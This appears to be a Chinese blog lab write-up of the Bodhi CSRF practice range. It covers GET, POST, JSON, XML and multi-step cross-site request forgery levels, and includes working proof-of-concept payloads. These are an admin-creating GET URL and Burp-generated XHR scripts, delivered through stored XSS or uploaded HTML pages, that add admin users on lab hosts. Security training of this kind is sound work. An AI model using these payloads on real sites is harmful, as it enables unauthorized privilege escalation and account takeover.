CSRF靶场练习

已于 2022-04-13 18:34:41 修改
阅读量1.9k 收藏 15
点赞数 2
分类专栏: 笔记 # 渗透 文章标签: CSRF XSS 网络攻防
于 2021-03-22 14:24:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45735611/article/details/114981838
版权

实验靶场

项目地址:https://github.com/amolnaik4/bodhi
搭建方式:

apt install docker.io
docker pull amolnaik4/bodhi_app
docker run -p 80:80 -p 8000:8000 amolnaik4/bodhi_app

tip:注意不要和服务器的已开启的服务端口冲突
靶场地址:http://服务器ip:80

在这里插入图片描述
第一次进入需要在首页Setup Bot中输入服务器ip地址
在这里插入图片描述
点击CSRF标签可以看到对应关卡的测试用户
在这里插入图片描述

在这里插入图片描述
Tip:需要说明的是,这里面的Poc都只需要提交即可,admin机器人会每过一分钟自动读取你上传的Poc,上传的文件可以访问服务器8000端口查看。

GET CSRF

GET CSRF是CSRF的表单,其中易受攻击的表单将使用HTTP方法GET提交。在这种情况下,所有表单值都将作为查询字符串传递给表单操作。在这里插入图片描述
攻击目的:创建一个admin用户得到flag

使用测试用户登陆
在这里插入图片描述
题目提示利用表单进行csrf攻击
在这里插入图片描述
随便输入然后看网络流量,找到get请求的地址
S

http://172.16.141.129/add_admin?username=a&password=a&isAdmin=yes&submit=Add User

  1. xss注入

    在Message Board板块构造xss语句,发送。
    在这里插入图片描述
    服务器的机器人admin会自动读取这段xss(每隔1分钟执行一次)

    在这里插入图片描述
    等大概一分钟后就可以去登陆刚才xss语句中尝试创建的用户了

    在这里插入图片描述

  2. 构造一个html page
    在这里插入图片描述
    在Upload PoC板块上传csrf页面
    在这里插入图片描述
    服务器会自动访问该页面,上传的文件可以访问服务器的8000端口看到
    在这里插入图片描述
    回到登陆界面,等待一分钟就可以登陆了。

    在这里插入图片描述

POST CSRF

首先,获取POST数据
在这里插入图片描述

  1. xss注入
    在这里插入图片描述
    异步请求,构造XMLHttpRequest对象,设置请求头,然后使用其发送异步请求。人
    记不到的话,可以直接使用bp生成使用XHR的代码
    在这里插入图片描述

    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://172.16.141.129/add_admin", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.withCredentials = true;
        var body = "username=77&password=a&isAdmin=yes&submit=Add+User";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>

  2. 表单页面上传
    通过burp自动生成可以自动上传的html页面(在Option 选择包含自动上传脚本)
    在这里插入图片描述
    选好之后还需要点一下下面的按钮生成
    在这里插入图片描述
    这一道题发现要使用XHR才可以(在Option 选择cross-domin XHR)

    <html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://172.16.141.129/add_admin", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.withCredentials = true;
        var body = "username=77&password=a&isAdmin=yes&submit=Add+User";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

    上传之后等一会就可以登陆了

JSON Based CSRF

同样POST数据,不过从表单form数据变成了json数据格式,在这种类型的CSRF中,脆弱的表单将与AJAX请求一起提交,表单值将在POST主体中作为JSON发送。这种类型的CSRF出现在基于REST的api中。

#json格式
{ "acct":"BOB", "amount":100 }

在这里插入图片描述
同样的使用bp工具生成脚本代码
在这里插入图片描述

  1. xss注入

    <script>       function submitRequest()       {         var xhr = new XMLHttpRequest();         xhr.open("POST", "http://192.168.43.54/add_admin", true);         xhr.setRequestHeader("Accept", "*/*");         xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");         xhr.setRequestHeader("Content-Type", "application/json");         xhr.withCredentials = true;         var body = "{\"username\":\"abc\",\"password\":\"acb\",\"isAdmin\":\"yes\",\"submit\":\"Add User\"}";         var aBody = new Uint8Array(body.length);         for (var i = 0; i < aBody.length; i++)           aBody[i] = body.charCodeAt(i);          xhr.send(new Blob([aBody]));       }       submitRequest();     </script>

    在这里插入图片描述

  2. 页面csrf

    <html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.43.54/add_admin", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "application/json");
        xhr.withCredentials = true;
        var body = "{\"username\":\"abc\",\"password\":\"acb\",\"isAdmin\":\"yes\",\"submit\":\"Add User\"}";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
XML Based CSRF

还是和POST表单差不多,不过表单值将作为XML文档发送到服务器,抓包,利用bp工具生成Poc

<xml version="1.0"><transfer><acct>BOB</acct><amount>100</amount></transfer>

在这里插入图片描述

上传页面,admin访问之后就成功创建账户了
在这里插入图片描述

Multi-step CSRF

很少有完成一个动作需要2个或更多表单提交的情况。在这种情况下,攻击者需要精心制作PoC,它将以相同的顺序提交所有需要的,以完成所需的结果。

#form1
POST http://bank.com/transfer.do HTTP/1.1

acct=BOB&stage=1
#form2
POST http://bank.com/transfer.do HTTP/1.1

amount=100

在这道题中,我们可以发现创建用户的时候需要确认2次,提交了2个表单。
第一个提交
在这里插入图片描述
在这里插入图片描述
第二个提交
在这里插入图片描述

在这里插入图片描述
可以看到,post数据中多了一个step参数,不过在最后一步,携带了所以需要的参数。???似乎不应该这样,

使用bp工具生成poc,类型选择多步骤表单。
在这里插入图片描述
在这里插入图片描述

Token Hijacking

通过在表单中使用随机标记并在处理表单值之前在服务器端进行验证,可以减轻CSRF漏洞。如果这样的应用程序容易受到XSS的攻击,则可以从表单访问令牌,并发送带有所需表单值的请求,从而导致所需的操作。这里的关键就是获得令牌。
在这里插入图片描述
不过发现留言那里同样有csrf-token
在这里插入图片描述
???不会阿

cc啊昂昂
关注
  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA靶场练习三—CSRF
afei001
05-04 712
CSRF介绍 CSRF跨站点请求伪造(Cross-Site Request Forgery)是一种攻击,它迫使最终用户在当前已通过身份验证的Web应用程序上执行不需要的操作。CSRF攻击专门针对状态更改请求而不是数据窃取,因为攻击者无法看到对伪造请求的响应。在社交工程的一点帮助下(例如通过电子邮件或聊天发送链接),攻击者可能会欺骗Web应用程序的用户执行攻击者选择的操作。如果...
CSRF靶场总结
qq_51582652的博客
03-22 736
CSRF总结CSRF概述CSRF漏洞挖掘基于GET方式 的CSRFXSS攻击方式文件攻击方式基于POST方式的CSRFXSS攻击方式 CSRF概述 csrf跨站请求伪造就是伪造链接,诱导用户点击修改用户的资料,密码等内容。执行非本意的操作。Csrf侧重的是修改用户的数据,而不是盗取数据。 CSRF漏洞挖掘 当页面只有Referer请求而没有token的时候,删掉Referer还能正常请求。说明存在CSRF漏洞。 可以直接构造请求伪造去碰。 基于GET方式 的CSRF XSS攻击方式 首先先指定服务器ip
CSRF靶场通关合集
最新发布
记录开发和安全学习过程中的点点滴滴
07-07 877
最进系统的将从web渗透到内网渗透的知识点做一个回顾,同时结合一些实战的案例来演示,下面是对刚开始学习时对靶场的一个总结.
CSRF跨站请求伪造 之 pikachu 靶场练习
Goodric的博客
01-17 415
CSRF( Cross-site request forgery,跨站请求伪造) 上一篇中对CSRF是什么进行了基本的了解,以及它与XSS的相比较:初识CSRFCSRF的攻击场景中,攻击者会伪造一个请求(一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,这个攻击也就完成了。 接下来我们通过pikachu 靶场里的 CSRF 测试项对 CSRF 的几个类型进行测试。 CSRF(get) 首先打开时一个登录界面。 点击提示可以看到可以登录这些用户。 然后就可以看到登录之后的界面了 当
CSRF漏洞靶场笔记
矜庄寂寥的博客
11-30 926
目录简介CSRF攻击步骤CSRF靶场记录CSRF(get)CSRF(post)CSRF(token验证) 简介 CSRF(Cross-site request forgery)全称为跨转请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗器其点击恶意链接或访问包含攻击代码的网页,在受害人不知情的情况下以受害人身份享服务器发送请求(如转账、改密等)。 由于已经获取了受害者的身份认证信息,在服务器看来,所有的请求均为合法正常的 CSRF攻击步骤 下面是以修改密码为例的简略流程图
pikachu----csrf练习
ptxybird的博客
06-16 252
pikachu--CSRF跨站请求伪造练习
pikachu靶场环境
02-12
通过参与Pikachu靶场练习,用户能够学习到以下关键知识点: 1. **Web安全**:理解Web应用程序的工作原理,识别常见的安全漏洞,如SQL注入、XSSCSRF(跨站请求伪造)等,并学会利用这些漏洞进行攻击,同时也学习...
vulhub漏洞测试靶场
08-16
靶场则是一系列靶机的集合,它为用户提供了一个真实的网络环境,可以在这里练习各种渗透测试技巧和漏洞利用方法。Vulhub作为这样的靶场,其目标是让安全专家和新手都能在一个可控的环境中了解和掌握漏洞利用。 2. *...
dvwa靶场训练.rar
03-17
《DVWA靶场训练——新手入门Web安全与渗透测试指南》 DVWA(Damn Vulnerable Web Application)是一款专为Web安全学习和渗透测试设计的开源靶场,它提供了各种典型的Web应用程序安全漏洞,帮助初学者了解和实践网络...
WEB渗透学习-XSS-labs靶场
04-20
6. **XSS攻击利用实战**:在高级关卡中,你可能需要利用XSS进行更复杂的操作,如cookie窃取、CSRF令牌篡改甚至会话劫持。 7. **安全编码实践**:靶场还会提供一些实际的编程案例,让你了解如何在开发过程中安全地...
靶场.zip
01-08
3. **pikachu-master.zip**: PikachU是一个在线Web安全靶场,包含了一系列与Web应用安全相关的练习,涵盖了SQL注入、文件包含、命令注入、XSS等多种攻击类型。通过解决这些挑战,你可以加深对Web应用安全攻防的理解...
一个CSRF靶场练习
NEARU的专栏
12-02 1965
CSRF_TEST xss+csrf的漏洞测试小靶场 难度递升的6个题目,第6个的技巧还是有的:正则取数据,延时请求。 靶场逻辑: 一个留言板功能(另一个上传html文件作为漏洞点)作为漏洞点+后台一个进程(admin_bot.py)模拟管理员访问留言板的内容。 文章目录CSRF_TEST代码运行poc1.get csrf2.post csrf1. 虚拟表单2. 异步请求3.JSON base...
Pikachu漏洞靶场系列之CSRF
weixin_45868644的博客
09-11 1466
文章目录概述CSRF攻击需要条件CSRFXSS的区别检测是否存在CSRF漏洞一、CSRF(get)二、CSRF(post)CSRF(token)防护措施 概述 CSRF 是 Cross Site Request Forgery 的 简称,中文名为跨域请求伪造,在CSRF的攻击场景中,攻击者会伪造一个请求(一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,这个攻击也就完成了、所以CSRF攻击也被称为“one click”攻击。 CSRF攻击需要条件 1、目标网站没有对修改个人信息修改的请
CSRF攻击-pikachu靶场
qq_43936524的博客
10-10 474
文章目录CSRF概念CSRF原理pikachu实例防范措施 CSRF概念 Cross-Site request forgrey简称CSRF,在CSRF攻击场景中攻击者会伪造一个请求,这个请求一般是链接,用户点击以后整个攻击也就完成了,故CSRF也被称为one click攻击。本质是攻击者盗用了目标用户的身份,以这个身份发送请求。 CSRF原理 举例: 用户C登录A网站进行购物,攻击者B想把用户A购物的收货地址改为自己的地址,那么攻击者B则需要1.用户C的登录权限 2.向服务器发送更改地址的请求。 攻击者B
六、内网渗透测试——(4)CSRF以及靶场作业
weixin_45540609的博客
04-27 703
CSRF 1、原理 csrf:跨站请求伪造,通过伪装来自受信任用户的请求来利用受信任的网站。浏览器在用户不知情的情况下发送数据包。 成因:网站cookie在浏览器中不会过期,只要不关闭浏览器或者退出登录,那以后只要是访问该网站,都会默认已登录状态。在这期间,攻击者发送了构造好的csrf脚本或包含csrf的链接,可能会执行一些用户不想做的功能。 ​ csrf需要适当的诱骗,因为csrf的代码是针对单一网站的。 exp:攻击脚本 poc:验证脚本 2、快速利用CSRF 用Burp抓包,.
CSRF实战靶场 --致谢大哥
weixin_30791095的博客
06-17 314
0X01无防护GET类型CSRF(伪造添加成员请求) 环境 靶机管理登陆 192.168.1.132 本机 192.168.1.5 首先我们登陆 test账号 然后点击 添加用户 构造出我们的url 然后发送给已经登陆的管理员 管理 点开连接 可以看见我们添加成功 0X02无防护POST类型csrf-伪造出添加成员的请求 你想让受害者执行的页面构造poc 大哥说用bu...
DVWA练习——CSRF(跨站请求伪造)
haoaaao的博客
01-27 484
一、难度:low (1)随便点击一下change,网页上面已经显示出了修改信息的url值。 (2)直接修改即可: 回车,信息已经修改: 新密码测试成功: (1)点击html打开,然后验证,发现失败 将html文件放在vul同级目录然后打开,验证失败: 抓包可以看到这里的链接是close 将html文件改为ip.html 验证成功 (2) 失败原因: /*** CSRF ————(二)绕过http_referer来源核对_Benjiamin.
csrf漏洞(pikachu靶场
qq_46527080的博客
12-26 950
1.基于get型 修改信息,抓个包,然后进行构造url链接 payload 咱们将地址改成eee 在浏览器中验证 然后必须是用户登录状态,才能进行 http://127.0.0.1:8086/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=18656565545&add=eee&email=lili%40pikachu.com&submit=submit 发现修改成功 我们也可以将这个链接生成一个短
pikachu靶场练习——CSRF详解
qq_42176496的博客
09-05 2388
pikachu靶场——CSRF详解
csrf dvwa靶场
09-13
在 DVWA 靶场中,你可以练习和测试 CSRF 攻击。它提供了一些漏洞和弱点,供你进行实验和学习,包括 CSRF 攻击。你可以使用 DVWA 来了解和理解如何利用此类漏洞,并学习如何防止和保护应用程序免受 CSRF 攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值